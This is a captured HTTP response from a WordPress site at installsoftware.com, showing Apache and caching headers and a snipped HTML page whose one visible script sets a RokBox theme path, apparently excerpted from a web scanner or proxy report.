Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Mon, 31 Jan 2011 20:18:17 GMT
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 44444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<script type="text/javascript">var rokboxPath = "http://www.installsoftware.com/wp-content/themes/rt_mynxx_wp/js/rokbox/";</script>
...[SNIP]...
